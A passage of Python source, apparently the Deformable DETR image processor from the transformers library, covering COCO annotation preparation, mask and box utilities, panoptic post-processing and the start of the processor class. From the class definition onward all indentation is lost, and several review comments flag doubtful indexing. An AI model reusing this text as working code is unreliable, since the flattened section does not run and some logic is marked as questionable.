        return tf.convert_to_tensor
    if is_torch_available() and is_torch_tensor(arr):
        import torch
        return torch.tensor
    if is_flax_available() and is_jax_tensor(arr):
        import jax.numpy as jnp
        return jnp.array
    raise ValueError(f"Cannot convert arrays of type {type(arr)}")
# Copied from transformers.models.detr.image_processing_detr.safe_squeeze
def safe_squeeze(arr: np.ndarray, axis: Optional[int] = None) -> np.ndarray:
    """Squeeze `arr`, but only when the targeted axis actually has length 1.

    With `axis=None` this is a plain squeeze of all unit axes. With an explicit
    axis, a squeeze numpy would reject is a no-op instead of an error.
    """
    if axis is None:
        return arr.squeeze()
    try:
        squeezed = arr.squeeze(axis=axis)
    except ValueError:
        # Axis was not of length 1 — leave the array untouched.
        return arr
    return squeezed
# Copied from transformers.models.detr.image_processing_detr.normalize_annotation
def normalize_annotation(annotation: Dict, image_size: Tuple[int, int]) -> Dict:
    """Convert absolute corner-format boxes to relative (cx, cy, w, h); all other keys are copied unchanged."""
    image_height, image_width = image_size
    scale = np.asarray([image_width, image_height, image_width, image_height], dtype=np.float32)
    norm_annotation = {}
    for key, value in annotation.items():
        if key != "boxes":
            norm_annotation[key] = value
            continue
        # (x0, y0, x1, y1) -> (cx, cy, w, h), then scale into [0, 1] by image size.
        centered_boxes = corners_to_center_format(value)
        centered_boxes /= scale
        norm_annotation[key] = centered_boxes
    return norm_annotation
# Copied from transformers.models.detr.image_processing_detr.max_across_indices
def max_across_indices(values: Iterable[Any]) -> List[Any]:
    """
    Return the maximum value across all indices of an iterable of values.
    """
    # zip(*values) transposes the rows into per-index columns; take the max of each.
    return list(map(max, zip(*values)))
# Copied from transformers.models.detr.image_processing_detr.get_max_height_width
def get_max_height_width(images: List[np.ndarray]) -> List[int]:
    """
    Get the maximum height and width across all images in a batch.
    """
    # Infer whether channels come first or last from the first image.
    channel_format = infer_channel_dimension_format(images[0])
    shapes = [img.shape for img in images]
    if channel_format == ChannelDimension.FIRST:
        _, max_height, max_width = max_across_indices(shapes)
    elif channel_format == ChannelDimension.LAST:
        max_height, max_width, _ = max_across_indices(shapes)
    else:
        raise ValueError(f"Invalid channel dimension format: {channel_format}")
    return (max_height, max_width)
# Copied from transformers.models.detr.image_processing_detr.make_pixel_mask
def make_pixel_mask(image: np.ndarray, output_size: Tuple[int, int]) -> np.ndarray:
    """
    Make a pixel mask for the image, where 1 indicates a valid pixel and 0 indicates padding.
    Args:
        image (`np.ndarray`):
            Image to make the pixel mask for.
        output_size (`Tuple[int, int]`):
            Output size of the mask.
    """
    valid_height, valid_width = get_image_size(image)
    mask = np.zeros(output_size, dtype=np.int64)
    # The real image occupies the top-left region of the padded canvas.
    mask[:valid_height, :valid_width] = 1
    return mask
# Copied from transformers.models.detr.image_processing_detr.convert_coco_poly_to_mask
def convert_coco_poly_to_mask(segmentations, height: int, width: int) -> np.ndarray:
    """
    Convert a COCO polygon annotation to a mask.
    Args:
        segmentations (`List[List[float]]`):
            List of polygons, each polygon represented by a list of x-y coordinates.
        height (`int`):
            Height of the mask.
        width (`int`):
            Width of the mask.
    """
    try:
        from pycocotools import mask as coco_mask
    except ImportError:
        raise ImportError("Pycocotools is not installed in your environment.")
    decoded_masks = []
    for polygons in segmentations:
        # Rasterize the polygon(s) via RLE, then collapse the per-polygon channel.
        rles = coco_mask.frPyObjects(polygons, height, width)
        decoded = coco_mask.decode(rles)
        if decoded.ndim < 3:
            decoded = decoded[..., None]
        decoded = np.asarray(decoded, dtype=np.uint8)
        decoded_masks.append(np.any(decoded, axis=2))
    if decoded_masks:
        return np.stack(decoded_masks, axis=0)
    # No polygons: return an empty (0, height, width) stack.
    return np.zeros((0, height, width), dtype=np.uint8)
# Copied from transformers.models.detr.image_processing_detr.prepare_coco_detection_annotation with DETR->DeformableDetr
def prepare_coco_detection_annotation(image, target, return_segmentation_masks: bool = False):
    """
    Convert the target in COCO format into the format expected by DeformableDetr.
    """
    image_height, image_width = get_image_size(image)
    # Single-element int64 array holding the COCO image id.
    image_id = target["image_id"]
    image_id = np.asarray([image_id], dtype=np.int64)
    # Get all COCO annotations for the given image.
    annotations = target["annotations"]
    # Drop crowd annotations; only individual object instances are kept.
    annotations = [obj for obj in annotations if "iscrowd" not in obj or obj["iscrowd"] == 0]
    classes = [obj["category_id"] for obj in annotations]
    classes = np.asarray(classes, dtype=np.int64)
    # for conversion to coco api
    area = np.asarray([obj["area"] for obj in annotations], dtype=np.float32)
    iscrowd = np.asarray([obj["iscrowd"] if "iscrowd" in obj else 0 for obj in annotations], dtype=np.int64)
    boxes = [obj["bbox"] for obj in annotations]
    # guard against no boxes via resizing
    boxes = np.asarray(boxes, dtype=np.float32).reshape(-1, 4)
    # COCO boxes are (x, y, width, height); convert to (x0, y0, x1, y1) corners
    # and clamp them to the image bounds.
    boxes[:, 2:] += boxes[:, :2]
    boxes[:, 0::2] = boxes[:, 0::2].clip(min=0, max=image_width)
    boxes[:, 1::2] = boxes[:, 1::2].clip(min=0, max=image_height)
    # Keep only boxes with strictly positive width and height.
    keep = (boxes[:, 3] > boxes[:, 1]) & (boxes[:, 2] > boxes[:, 0])
    new_target = {}
    new_target["image_id"] = image_id
    new_target["class_labels"] = classes[keep]
    new_target["boxes"] = boxes[keep]
    new_target["area"] = area[keep]
    new_target["iscrowd"] = iscrowd[keep]
    new_target["orig_size"] = np.asarray([int(image_height), int(image_width)], dtype=np.int64)
    if annotations and "keypoints" in annotations[0]:
        keypoints = [obj["keypoints"] for obj in annotations]
        keypoints = np.asarray(keypoints, dtype=np.float32)
        # NOTE(review): shape[0] here is the number of annotated objects, not the
        # number of keypoints, and after the reshape the first axis no longer
        # aligns with `keep` — confirm this indexing is intended.
        num_keypoints = keypoints.shape[0]
        keypoints = keypoints.reshape((-1, 3)) if num_keypoints else keypoints
        new_target["keypoints"] = keypoints[keep]
    if return_segmentation_masks:
        segmentation_masks = [obj["segmentation"] for obj in annotations]
        masks = convert_coco_poly_to_mask(segmentation_masks, image_height, image_width)
        new_target["masks"] = masks[keep]
    return new_target
# Copied from transformers.models.detr.image_processing_detr.masks_to_boxes
def masks_to_boxes(masks: np.ndarray) -> np.ndarray:
    """
    Compute the bounding boxes around the provided panoptic segmentation masks.
    Args:
        masks: masks in format `[number_masks, height, width]` where N is the number of masks
    Returns:
        boxes: bounding boxes in format `[number_masks, 4]` in xyxy format
    """
    if masks.size == 0:
        return np.zeros((0, 4))
    height, width = masks.shape[-2:]
    row_coords = np.arange(0, height, dtype=np.float32)
    col_coords = np.arange(0, width, dtype=np.float32)
    # "ij" indexing keeps (row, col) ordering; see https://github.com/pytorch/pytorch/issues/50276
    grid_y, grid_x = np.meshgrid(row_coords, col_coords, indexing="ij")
    outside = ~(np.array(masks, dtype=bool))
    # Max over the mask gives the right/bottom edges; min over a masked array
    # (holes filled with a huge value) gives the left/top edges.
    x_values = masks * np.expand_dims(grid_x, axis=0)
    x_max = x_values.reshape(x_values.shape[0], -1).max(-1)
    x_min = np.ma.array(x_values, mask=outside).filled(fill_value=1e8)
    x_min = x_min.reshape(x_min.shape[0], -1).min(-1)
    y_values = masks * np.expand_dims(grid_y, axis=0)
    y_max = y_values.reshape(y_values.shape[0], -1).max(-1)
    y_min = np.ma.array(y_values, mask=outside).filled(fill_value=1e8)
    y_min = y_min.reshape(y_min.shape[0], -1).min(-1)
    return np.stack([x_min, y_min, x_max, y_max], 1)
# Copied from transformers.models.detr.image_processing_detr.prepare_coco_panoptic_annotation with DETR->DeformableDetr
def prepare_coco_panoptic_annotation(
    image: np.ndarray, target: Dict, masks_path: Union[str, pathlib.Path], return_masks: bool = True
) -> Dict:
    """
    Prepare a coco panoptic annotation for DeformableDetr.
    """
    image_height, image_width = get_image_size(image)
    # Path to the RGB-encoded panoptic PNG holding this image's segment ids.
    annotation_path = pathlib.Path(masks_path) / target["file_name"]
    new_target = {}
    # Some panoptic targets use "id" instead of "image_id".
    new_target["image_id"] = np.asarray([target["image_id"] if "image_id" in target else target["id"]], dtype=np.int64)
    new_target["size"] = np.asarray([image_height, image_width], dtype=np.int64)
    new_target["orig_size"] = np.asarray([image_height, image_width], dtype=np.int64)
    if "segments_info" in target:
        # Decode the RGB panoptic PNG into per-pixel segment ids, then split it
        # into one binary mask per annotated segment.
        masks = np.asarray(PIL.Image.open(annotation_path), dtype=np.uint32)
        masks = rgb_to_id(masks)
        ids = np.array([segment_info["id"] for segment_info in target["segments_info"]])
        masks = masks == ids[:, None, None]
        masks = masks.astype(np.uint8)
        if return_masks:
            new_target["masks"] = masks
        # Boxes are always derived from the masks, even when the masks
        # themselves are not returned.
        new_target["boxes"] = masks_to_boxes(masks)
        new_target["class_labels"] = np.array(
            [segment_info["category_id"] for segment_info in target["segments_info"]], dtype=np.int64
        )
        new_target["iscrowd"] = np.asarray(
            [segment_info["iscrowd"] for segment_info in target["segments_info"]], dtype=np.int64
        )
        new_target["area"] = np.asarray(
            [segment_info["area"] for segment_info in target["segments_info"]], dtype=np.float32
        )
    return new_target
# Copied from transformers.models.detr.image_processing_detr.get_segmentation_image
def get_segmentation_image(
    masks: np.ndarray, input_size: Tuple, target_size: Tuple, stuff_equiv_classes, deduplicate=False
):
    """
    Turn per-query mask scores into one RGB-encoded segmentation image.

    Each pixel is assigned to the highest-scoring mask, masks of the same stuff
    class are optionally merged, and the resulting id map is RGB-encoded and
    resized to `target_size`.
    """
    h, w = input_size
    final_h, final_w = target_size
    # Callers pass `masks` flattened to (num_queries, h*w); the transpose makes
    # the query axis the softmax/argmax axis, giving a per-pixel winning query.
    m_id = scipy.special.softmax(masks.transpose(0, 1), -1)
    if m_id.shape[-1] == 0:
        # We didn't detect any mask :(
        m_id = np.zeros((h, w), dtype=np.int64)
    else:
        m_id = m_id.argmax(-1).reshape(h, w)
    if deduplicate:
        # Merge the masks corresponding to the same stuff class
        for equiv in stuff_equiv_classes.values():
            for eq_id in equiv:
                m_id[m_id == eq_id] = equiv[0]
    # Encode segment ids as RGB and resize (note: resize takes (width, height)).
    seg_img = id_to_rgb(m_id)
    seg_img = resize(seg_img, (final_w, final_h), resample=PILImageResampling.NEAREST)
    return seg_img
# Copied from transformers.models.detr.image_processing_detr.get_mask_area
def get_mask_area(seg_img: np.ndarray, target_size: Tuple[int, int], n_classes: int) -> np.ndarray:
    """Per segment id, count how many pixels of the RGB-encoded segmentation map it occupies.

    Note: despite the annotation, the result is a plain list of pixel counts,
    one entry per id in `range(n_classes)`.
    """
    final_h, final_w = target_size
    # Decode the RGB image back into per-pixel segment ids.
    id_map = rgb_to_id(seg_img.astype(np.uint8).reshape(final_h, final_w, 3))
    return [(id_map == segment_id).sum() for segment_id in range(n_classes)]
# Copied from transformers.models.detr.image_processing_detr.score_labels_from_class_probabilities
def score_labels_from_class_probabilities(logits: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
    """Softmax the logits over the last axis and return (best score, best label) per item."""
    probs = scipy.special.softmax(logits, axis=-1)
    # keepdims lets take_along_axis pick each row's winning probability.
    labels = probs.argmax(-1, keepdims=True)
    scores = np.take_along_axis(probs, labels, axis=-1)
    return scores.squeeze(-1), labels.squeeze(-1)
# Copied from transformers.models.detr.image_processing_detr.post_process_panoptic_sample
def post_process_panoptic_sample(
    out_logits: np.ndarray,
    masks: np.ndarray,
    boxes: np.ndarray,
    processed_size: Tuple[int, int],
    target_size: Tuple[int, int],
    is_thing_map: Dict,
    threshold=0.85,
) -> Dict:
    """
    Converts the output of [`DetrForSegmentation`] into panoptic segmentation predictions for a single sample.
    Args:
        out_logits (`torch.Tensor`):
            The logits for this sample.
        masks (`torch.Tensor`):
            The predicted segmentation masks for this sample.
        boxes (`torch.Tensor`):
            The prediced bounding boxes for this sample. The boxes are in the normalized format `(center_x, center_y,
            width, height)` and values between `[0, 1]`, relative to the size the image (disregarding padding).
        processed_size (`Tuple[int, int]`):
            The processed size of the image `(height, width)`, as returned by the preprocessing step i.e. the size
            after data augmentation but before batching.
        target_size (`Tuple[int, int]`):
            The target size of the image, `(height, width)` corresponding to the requested final size of the
            prediction.
        is_thing_map (`Dict`):
            A dictionary mapping class indices to a boolean value indicating whether the class is a thing or not.
        threshold (`float`, *optional*, defaults to 0.85):
            The threshold used to binarize the segmentation masks.
    """
    # we filter empty queries and detection below threshold
    scores, labels = score_labels_from_class_probabilities(out_logits)
    keep = (labels != out_logits.shape[-1] - 1) & (scores > threshold)
    cur_scores = scores[keep]
    cur_classes = labels[keep]
    cur_boxes = center_to_corners_format(boxes[keep])
    if len(cur_boxes) != len(cur_classes):
        raise ValueError("Not as many boxes as there are classes")
    # Resize the kept soft masks to the processed image size.
    cur_masks = masks[keep]
    cur_masks = resize(cur_masks[:, None], processed_size, resample=PILImageResampling.BILINEAR)
    cur_masks = safe_squeeze(cur_masks, 1)
    b, h, w = cur_masks.shape
    # It may be that we have several predicted masks for the same stuff class.
    # In the following, we track the list of masks ids for each stuff class (they are merged later on)
    cur_masks = cur_masks.reshape(b, -1)
    stuff_equiv_classes = defaultdict(list)
    for k, label in enumerate(cur_classes):
        if not is_thing_map[label]:
            stuff_equiv_classes[label].append(k)
    seg_img = get_segmentation_image(cur_masks, processed_size, target_size, stuff_equiv_classes, deduplicate=True)
    # NOTE(review): this first call passes the flattened masks while the in-loop
    # call below passes `seg_img` — confirm which argument is intended.
    area = get_mask_area(cur_masks, processed_size, n_classes=len(cur_scores))
    # We filter out any mask that is too small
    # Fix: `cur_classes` is a numpy array, so `size` is an int attribute; the
    # previous `cur_classes.size()` call raised "'int' object is not callable".
    if cur_classes.size > 0:
        # We know filter empty masks as long as we find some
        filtered_small = np.array([a <= 4 for a in area], dtype=bool)
        while filtered_small.any():
            cur_masks = cur_masks[~filtered_small]
            cur_scores = cur_scores[~filtered_small]
            cur_classes = cur_classes[~filtered_small]
            seg_img = get_segmentation_image(cur_masks, (h, w), target_size, stuff_equiv_classes, deduplicate=True)
            area = get_mask_area(seg_img, target_size, n_classes=len(cur_scores))
            filtered_small = np.array([a <= 4 for a in area], dtype=bool)
    else:
        cur_classes = np.ones((1, 1), dtype=np.int64)
    segments_info = [
        {"id": i, "isthing": is_thing_map[cat], "category_id": int(cat), "area": a}
        for i, (cat, a) in enumerate(zip(cur_classes, area))
    ]
    del cur_classes
    # Serialize the RGB segmentation image to PNG bytes for the prediction dict.
    with io.BytesIO() as out:
        PIL.Image.fromarray(seg_img).save(out, format="PNG")
        predictions = {"png_string": out.getvalue(), "segments_info": segments_info}
    return predictions
# Copied from transformers.models.detr.image_processing_detr.resize_annotation
def resize_annotation(
    annotation: Dict[str, Any],
    orig_size: Tuple[int, int],
    target_size: Tuple[int, int],
    threshold: float = 0.5,
    resample: PILImageResampling = PILImageResampling.NEAREST,
):
    """
    Rescale an annotation so it matches an image resized from `orig_size` to `target_size`.

    Args:
        annotation (`Dict[str, Any]`):
            The annotation dictionary (may contain "boxes", "area", "masks", "size", ...).
        orig_size (`Tuple[int, int]`):
            The (height, width) of the image before resizing.
        target_size (`Tuple[int, int]`):
            The (height, width) of the image after the preprocessing `resize` step.
        threshold (`float`, *optional*, defaults to 0.5):
            Threshold used to re-binarize the segmentation masks after interpolation.
        resample (`PILImageResampling`, defaults to `PILImageResampling.NEAREST`):
            Resampling filter used for the masks.
    """
    # Per-axis scale factors: sizes are (height, width) tuples.
    ratio_height, ratio_width = (float(new) / float(old) for new, old in zip(target_size, orig_size))

    resized = {"size": target_size}
    for key, value in annotation.items():
        if key == "boxes":
            # Boxes are (x, y, x, y)-like, so the scale vector interleaves width/height factors.
            scale = np.asarray([ratio_width, ratio_height, ratio_width, ratio_height], dtype=np.float32)
            resized["boxes"] = value * scale
        elif key == "area":
            resized["area"] = value * (ratio_width * ratio_height)
        elif key == "masks":
            # Resize each mask individually, then re-binarize: interpolation produces soft values.
            interpolated = np.array([resize(mask, target_size, resample=resample) for mask in value[:, None]])
            resized["masks"] = interpolated.astype(np.float32)[:, 0] > threshold
        elif key == "size":
            resized["size"] = target_size
        else:
            # Anything we don't recognize is passed through untouched.
            resized[key] = value
    return resized
# Copied from transformers.models.detr.image_processing_detr.binary_mask_to_rle
def binary_mask_to_rle(mask):
    """
    Convert a binary mask of shape `(height, width)` into run-length encoding (RLE).

    Args:
        mask (`torch.Tensor` or `numpy.array`):
            A binary mask tensor of shape `(height, width)` where 0 denotes background and 1 denotes the target
            segment_id or class_id.

    Returns:
        `List`: Run-length encoded list of the binary mask. Refer to COCO API for more information about the RLE
        format.
    """
    if is_torch_tensor(mask):
        mask = mask.numpy()
    # Pad with a zero on each side so every run has a well-defined start and end boundary.
    padded = np.concatenate([[0], mask.flatten(), [0]])
    # Positions where the value changes mark run boundaries (shifted to 1-based indices).
    boundaries = np.where(padded[1:] != padded[:-1])[0] + 1
    # Turn each run's absolute end position into its length.
    boundaries[1::2] -= boundaries[::2]
    return list(boundaries)
# Copied from transformers.models.detr.image_processing_detr.convert_segmentation_to_rle
def convert_segmentation_to_rle(segmentation):
    """
    Convert a segmentation map of shape `(height, width)` into run-length encoding (RLE), one encoding per
    distinct segment / class id present in the map.

    Args:
        segmentation (`torch.Tensor` or `numpy.array`):
            A segmentation map of shape `(height, width)` where each value denotes a segment or class id.

    Returns:
        `List[List]`: A list of lists, where each list is the run-length encoding of a segment / class id.
    """
    # One binary mask (and therefore one RLE) per unique id, in torch.unique's sorted order.
    return [
        binary_mask_to_rle(torch.where(segmentation == segment_id, 1, 0))
        for segment_id in torch.unique(segmentation)
    ]
# Copied from transformers.models.detr.image_processing_detr.remove_low_and_no_objects
def remove_low_and_no_objects(masks, scores, labels, object_mask_threshold, num_labels):
    """
    Filter query predictions, keeping only those whose score clears `object_mask_threshold` and whose label is a
    real object class (i.e. not the "no object" class, encoded as `num_labels`).

    Args:
        masks (`torch.Tensor`):
            A tensor of shape `(num_queries, height, width)`.
        scores (`torch.Tensor`):
            A tensor of shape `(num_queries)`.
        labels (`torch.Tensor`):
            A tensor of shape `(num_queries)`.
        object_mask_threshold (`float`):
            A number between 0 and 1 used to binarize the masks.
        num_labels (`int`):
            The label id reserved for the "no object" class.

    Raises:
        `ValueError`: Raised when the first dimension doesn't match in all input tensors.

    Returns:
        `Tuple[torch.Tensor, torch.Tensor, torch.Tensor]`: The filtered `masks`, `scores` and `labels`.
    """
    if not (masks.shape[0] == scores.shape[0] == labels.shape[0]):
        raise ValueError("mask, scores and labels must have the same shape!")

    # Keep a query only if it predicts a real class AND is confident enough.
    keep = (labels != num_labels) & (scores > object_mask_threshold)
    return masks[keep], scores[keep], labels[keep]
# Copied from transformers.models.detr.image_processing_detr.check_segment_validity
def check_segment_validity(mask_labels, mask_probs, k, mask_threshold=0.5, overlap_mask_area_threshold=0.8):
    """
    Decide whether query `k` yields a valid segment.

    A segment is valid when the per-pixel argmax assigned it some area, its own probability map clears
    `mask_threshold` somewhere, and the assigned area covers a sufficiently large fraction
    (`overlap_mask_area_threshold`) of the thresholded probability area — this drops disconnected tiny segments.

    Returns a `(mask_exists, mask_k)` pair where `mask_k` is the boolean mask of pixels assigned to query `k`.
    """
    # Pixels the final argmax assigned to query k.
    segment_mask = mask_labels == k
    assigned_area = segment_mask.sum()

    # Pixels where query k's own probability clears the threshold.
    candidate_area = (mask_probs[k] >= mask_threshold).sum()

    segment_exists = assigned_area > 0 and candidate_area > 0
    if segment_exists:
        # Discard segments that kept too small a fraction of their candidate area.
        coverage = assigned_area / candidate_area
        if not coverage.item() > overlap_mask_area_threshold:
            segment_exists = False

    return segment_exists, segment_mask
# Copied from transformers.models.detr.image_processing_detr.compute_segments
def compute_segments(
    mask_probs,
    pred_scores,
    pred_labels,
    mask_threshold: float = 0.5,
    overlap_mask_area_threshold: float = 0.8,
    label_ids_to_fuse: Optional[Set[int]] = None,
    target_size: Tuple[int, int] = None,
):
    """
    Build a panoptic segmentation map from per-query mask probabilities, scores and labels.

    Returns a `(segmentation, segments)` pair: an int32 map of segment ids of shape `(height, width)` and a list
    of per-segment metadata dicts. Queries whose class is in `label_ids_to_fuse` share a single segment id.
    """
    # Work at the requested output resolution if one is given.
    if target_size is not None:
        height, width = target_size
        mask_probs = nn.functional.interpolate(
            mask_probs.unsqueeze(0), size=target_size, mode="bilinear", align_corners=False
        )[0]
    else:
        height, width = mask_probs.shape[1], mask_probs.shape[2]

    segmentation = torch.zeros((height, width), dtype=torch.int32, device=mask_probs.device)
    segments: List[Dict] = []
    current_segment_id = 0

    # Weight each query's mask by its confidence before taking the per-pixel argmax.
    # NOTE: kept in-place to match the original's side effect on the input tensor.
    mask_probs *= pred_scores.view(-1, 1, 1)
    mask_labels = mask_probs.argmax(0)  # [height, width]

    # Track the segment id already assigned to each fused ("stuff") class.
    stuff_memory_list: Dict[str, int] = {}
    for k in range(pred_labels.shape[0]):
        pred_class = pred_labels[k].item()
        should_fuse = pred_class in label_ids_to_fuse

        # Check the query produced a mask that exists and is large enough to be a segment.
        mask_exists, mask_k = check_segment_validity(
            mask_labels, mask_probs, k, mask_threshold, overlap_mask_area_threshold
        )
        if not mask_exists:
            continue

        # Reuse an earlier segment id for the same fused class, otherwise open a new one.
        if pred_class in stuff_memory_list:
            current_segment_id = stuff_memory_list[pred_class]
        else:
            current_segment_id += 1

        # Stamp this segment onto the final segmentation map.
        segmentation[mask_k] = current_segment_id
        segments.append(
            {
                "id": current_segment_id,
                "label_id": pred_class,
                "was_fused": should_fuse,
                "score": round(pred_scores[k].item(), 6),
            }
        )
        if should_fuse:
            stuff_memory_list[pred_class] = current_segment_id

    return segmentation, segments
class DeformableDetrImageProcessor(BaseImageProcessor):
r"""
Constructs a Deformable DETR image processor.
Args:
format (`str`, *optional*, defaults to `"coco_detection"`):
Data format of the annotations. One of "coco_detection" or "coco_panoptic".
do_resize (`bool`, *optional*, defaults to `True`):
Controls whether to resize the image's (height, width) dimensions to the specified `size`. Can be
overridden by the `do_resize` parameter in the `preprocess` method.
size (`Dict[str, int]` *optional*, defaults to `{"shortest_edge": 800, "longest_edge": 1333}`):
Size of the image's (height, width) dimensions after resizing. Can be overridden by the `size` parameter in
the `preprocess` method.
resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BILINEAR`):
Resampling filter to use if resizing the image.
do_rescale (`bool`, *optional*, defaults to `True`):
Controls whether to rescale the image by the specified scale `rescale_factor`. Can be overridden by the
`do_rescale` parameter in the `preprocess` method.
rescale_factor (`int` or `float`, *optional*, defaults to `1/255`):
Scale factor to use if rescaling the image. Can be overridden by the `rescale_factor` parameter in the
`preprocess` method.
do_normalize:
Controls whether to normalize the image. Can be overridden by the `do_normalize` parameter in the
`preprocess` method.
image_mean (`float` or `List[float]`, *optional*, defaults to `IMAGENET_DEFAULT_MEAN`):
Mean values to use when normalizing the image. Can be a single value or a list of values, one for each
channel. Can be overridden by the `image_mean` parameter in the `preprocess` method.
image_std (`float` or `List[float]`, *optional*, defaults to `IMAGENET_DEFAULT_STD`):
Standard deviation values to use when normalizing the image. Can be a single value or a list of values, one
for each channel. Can be overridden by the `image_std` parameter in the `preprocess` method.
do_pad (`bool`, *optional*, defaults to `True`):
Controls whether to pad the image to the largest image in a batch and create a pixel mask. Can be
overridden by the `do_pad` parameter in the `preprocess` method.
"""
model_input_names = ["pixel_values", "pixel_mask"]
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.__init__
def __init__(
self,
format: Union[str, AnnotionFormat] = AnnotionFormat.COCO_DETECTION,
do_resize: bool = True,
size: Dict[str, int] = None,
resample: PILImageResampling = PILImageResampling.BILINEAR,
do_rescale: bool = True,
rescale_factor: Union[int, float] = 1 / 255,
do_normalize: bool = True,
image_mean: Union[float, List[float]] = None,
image_std: Union[float, List[float]] = None,
do_pad: bool = True,
**kwargs,
) -> None:
if "pad_and_return_pixel_mask" in kwargs:
do_pad = kwargs.pop("pad_and_return_pixel_mask")
if "max_size" in kwargs:
warnings.warn(
"The `max_size` parameter is deprecated and will be removed in v4.26. "
"Please specify in `size['longest_edge'] instead`.",
FutureWarning,
)
max_size = kwargs.pop("max_size")
else:
max_size = None if size is None else 1333
size = size if size is not None else {"shortest_edge": 800, "longest_edge": 1333}
size = get_size_dict(size, max_size=max_size, default_to_square=False)
super().__init__(**kwargs)
self.format = format
self.do_resize = do_resize
self.size = size
self.resample = resample
self.do_rescale = do_rescale
self.rescale_factor = rescale_factor
self.do_normalize = do_normalize
self.image_mean = image_mean if image_mean is not None else IMAGENET_DEFAULT_MEAN
self.image_std = image_std if image_std is not None else IMAGENET_DEFAULT_STD
self.do_pad = do_pad
@property
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.max_size
def max_size(self):
warnings.warn(
"The `max_size` parameter is deprecated and will be removed in v4.27. "
"Please specify in `size['longest_edge'] instead`.",
FutureWarning,
)
return self.size["longest_edge"]
@classmethod
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.from_dict with Detr->DeformableDetr
def from_dict(cls, image_processor_dict: Dict[str, Any], **kwargs):
"""
Overrides the `from_dict` method from the base class to make sure parameters are updated if image processor is
created using from_dict and kwargs e.g. `DeformableDetrImageProcessor.from_pretrained(checkpoint, size=600,
max_size=800)`
"""
image_processor_dict = image_processor_dict.copy()
if "max_size" in kwargs:
image_processor_dict["max_size"] = kwargs.pop("max_size")
if "pad_and_return_pixel_mask" in kwargs:
image_processor_dict["pad_and_return_pixel_mask"] = kwargs.pop("pad_and_return_pixel_mask")
return super().from_dict(image_processor_dict, **kwargs)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.prepare_annotation with DETR->DeformableDetr
def prepare_annotation(
self,
image: np.ndarray,
target: Dict,
format: Optional[AnnotionFormat] = None,
return_segmentation_masks: bool = None,
masks_path: Optional[Union[str, pathlib.Path]] = None,
) -> Dict:
"""
Prepare an annotation for feeding into DeformableDetr model.
"""
format = format if format is not None else self.format
if format == AnnotionFormat.COCO_DETECTION:
return_segmentation_masks = False if return_segmentation_masks is None else return_segmentation_masks
target = prepare_coco_detection_annotation(image, target, return_segmentation_masks)
elif format == AnnotionFormat.COCO_PANOPTIC:
return_segmentation_masks = True if return_segmentation_masks is None else return_segmentation_masks
target = prepare_coco_panoptic_annotation(
image, target, masks_path=masks_path, return_masks=return_segmentation_masks
)
else:
raise ValueError(f"Format {format} is not supported.")
return target
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.prepare
def prepare(self, image, target, return_segmentation_masks=None, masks_path=None):
warnings.warn(
"The `prepare` method is deprecated and will be removed in a future version. "
"Please use `prepare_annotation` instead. Note: the `prepare_annotation` method "
"does not return the image anymore.",
)
target = self.prepare_annotation(image, target, return_segmentation_masks, masks_path, self.format)
return image, target
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.convert_coco_poly_to_mask
def convert_coco_poly_to_mask(self, *args, **kwargs):
warnings.warn("The `convert_coco_poly_to_mask` method is deprecated and will be removed in a future version. ")
return convert_coco_poly_to_mask(*args, **kwargs)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.prepare_coco_detection
def prepare_coco_detection(self, *args, **kwargs):
warnings.warn("The `prepare_coco_detection` method is deprecated and will be removed in a future version. ")
return prepare_coco_detection_annotation(*args, **kwargs)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.prepare_coco_panoptic
def prepare_coco_panoptic(self, *args, **kwargs):
warnings.warn("The `prepare_coco_panoptic` method is deprecated and will be removed in a future version. ")
return prepare_coco_panoptic_annotation(*args, **kwargs)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.resize
def resize(
self,
image: np.ndarray,
size: Dict[str, int],
resample: PILImageResampling = PILImageResampling.BILINEAR,
data_format: Optional[ChannelDimension] = None,
**kwargs,
) -> np.ndarray:
"""
Resize the image to the given size. Size can be `min_size` (scalar) or `(height, width)` tuple. If size is an
int, smaller edge of the image will be matched to this number.
"""
if "max_size" in kwargs:
warnings.warn(
"The `max_size` parameter is deprecated and will be removed in v4.26. "
"Please specify in `size['longest_edge'] instead`.",
FutureWarning,
)
max_size = kwargs.pop("max_size")
else:
max_size = None
size = get_size_dict(size, max_size=max_size, default_to_square=False)
if "shortest_edge" in size and "longest_edge" in size:
size = get_resize_output_image_size(image, size["shortest_edge"], size["longest_edge"])
elif "height" in size and "width" in size:
size = (size["height"], size["width"])
else:
raise ValueError(
"Size must contain 'height' and 'width' keys or 'shortest_edge' and 'longest_edge' keys. Got"
f" {size.keys()}."
)
image = resize(image, size=size, resample=resample, data_format=data_format)
return image
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.resize_annotation
def resize_annotation(
self,
annotation,
orig_size,
size,
resample: PILImageResampling = PILImageResampling.NEAREST,
) -> Dict:
"""
Resize the annotation to match the resized image. If size is an int, smaller edge of the mask will be matched
to this number.
"""
return resize_annotation(annotation, orig_size=orig_size, target_size=size, resample=resample)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.rescale
def rescale(
self, image: np.ndarray, rescale_factor: Union[float, int], data_format: Optional[ChannelDimension] = None
) -> np.ndarray:
"""
Rescale the image by the given factor.
"""
return rescale(image, rescale_factor, data_format=data_format)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.normalize
def normalize(
self,
image: np.ndarray,
mean: Union[float, Iterable[float]],
std: Union[float, Iterable[float]],
data_format: Optional[ChannelDimension] = None,
) -> np.ndarray:
"""
Normalize the image with the given mean and standard deviation.
"""
return normalize(image, mean=mean, std=std, data_format=data_format)
# Copied from transformers.models.detr.image_processing_detr.DetrImageProcessor.normalize_annotation
def normalize_annotation(self, annotation: Dict, image_size: Tuple[int, int]) -> Dict:
"""
Normalize the boxes in the annotation from `[top_left_x, top_left_y, bottom_right_x, bottom_right_y]` to
`[center_x, center_y, width, height]` format.
"""
return normalize_annotation(annotation, image_size=image_size)
